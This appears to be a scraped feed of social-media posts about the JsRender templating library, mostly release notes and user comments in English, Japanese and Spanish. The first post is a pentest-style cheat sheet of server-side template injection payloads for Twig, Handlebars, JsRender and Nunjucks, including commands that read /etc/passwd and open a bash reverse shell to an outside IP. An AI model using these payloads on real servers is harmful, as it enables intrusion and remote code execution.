Daily Notes : Day 50 SSTI PAYLOADS - Part 2 Twig : {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}} Handlebar path traversal: curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'ctf.domain.com:9090/' JsRender (NodeJS): {{:"test%22.toString.constructor.call({},"alert('xss')")()}} NUNJUCKS (NodeJS) : {{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}} {{range.constructor("return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>&1\"')")()}}

There are thousands of js template engines, but only one is the best: import {render, templates} from 'jsrender'; const template = 'Hello {{:name}}'; const text = templates(template).render(payload); Why: - simple - simple - simple #jsrender #javascript #it

This gets more complicated when the template can change based on the data, but the premise is the same. I'm using JsRender right now for the templating.

#goopass 届いたの2回目かな？ メールに置換文字が出ちゃってるのが職柄気になるすぎる。たぶんjsRender？がうまく機能してないようで どうか関係者の目に留まりますように

JsRenderのコンバーターの使い方をやっと理解したけど、ティラノで使おうと思ったら改造しないといけないっぽいなあ。 例えば、プレイ時間を表示したい時に{{secto:stat.f.playtime}}で数値を何時間何分何秒に変換できたらべんりだべ。と思っただよ。 あとは三桁区切りとかあるといいねえ（妄想）

TIPプラグインを参考にインベントリをJsRenderで書き直してみた。なるほど便利だ～

#JsRender v1.0.11 and #JsViews v1.0.11 have just been released (Small feature improvement, and minor bug fix) jsviews.com/#download github.com/BorisMoore/jsrend…

In this blog post we explore Template Injection attacks against the JsRender/JsViews library and invite you to follow along with the exploit examples using a sample vulnerable application. Read more: bit.ly/33ANoqH #webapplicationsecurity #javascript #Exploit

「TIPプラグイン」を v4.01b へアップデートしました。 機能は変わらずですが、テンプレートをスッキリさせたので、jsRenderのタグが使えるのはどこ？という混乱はなくなっています。 あと、パラメータを少し整理しました。 #ティラノスクリプト hororo.wp.xdomain.jp/22/

#JsRender v1.0.7 and #JsViews v1.0.7 just released, including some performance optimizations, feature improvements, minor bug fixes, and documentation updates. - jsviews.com/#download - github.com/BorisMoore/jsview…

El maravilloso mundo de pasar lo "estático" a "dinámico", las templates y el jsrender.

With the new #JsRender v1.0.5 and #JsViews v1.0.5 release, just out, the jsrender and the jsviews npm packages each bundle the corresponding typescript definition file. So installing the package also automatically installs the typescript definition: jsviews.com/#typescript:

Here is a nice response from Stack Overflow to a question on how JsRender/JsViews compares as a platform to better known frameworks such as Angular, React, Vue: stackoverflow.com/a/57322571…

#JsRender v1.0.2 and #JsViews v1.0.2 just released: github.com/BorisMoore/jsview… - Important optimization for {^{for}} with sorting, filtering etc. - New sorting and filtering samples topic jsviews.com/#samples/sort-fi… - Plus minor fixes, and documentation updates

#JsRender v1.0.0 and #JsViews v1.0.0 released today: jsviews.com/#download cdnjs.com/libraries/jsrender cdnjs.com/libraries/jsviews npmjs.com/package/jsrender npmjs.com/package/jsviews Both are official stable non-beta releases with complete docs, now out too, at jsviews.com

A new update (91) to #JsRender and #JsViews just released: github.com/BorisMoore/jsview… It's been a long time, but brings a wealth of new and improved features! Also many important and extensive new documentation topics, (and several bug fixes). I'll tweet some specific links...

TIPプラグイン Ver3.03公開しました。 jsRenderテンプレート読み込みを「GET」に修正しています。 その他変更ありません。 hororo.wp.xdomain.jp/22/

A fine (PfaJn) /ˈfaɪn/ stack to put @LeafletJS #maps 🗺️on the web. @postgis @fastifyjs #jsrender @BorisMoore @nodejs @Geolytix 👏👏👏medium.com/@goldrydigital/a-…

TIPプラグイン作り直しの目途がついてきたー。 jsRender使ったら、わかる人しか使えないような感じになってしまったがまぁいいや。 不要なサンプル画像同梱するのが嫌なので、CSSでゴリゴリゴリゴリ…

JsRender/JsViews update v0.9.90 out today. Getting closer and closer to final v1.0 release. This update includes several fit and finish changes and minor bug fixes. github.com/BorisMoore/jsview… #jsrender #jsviews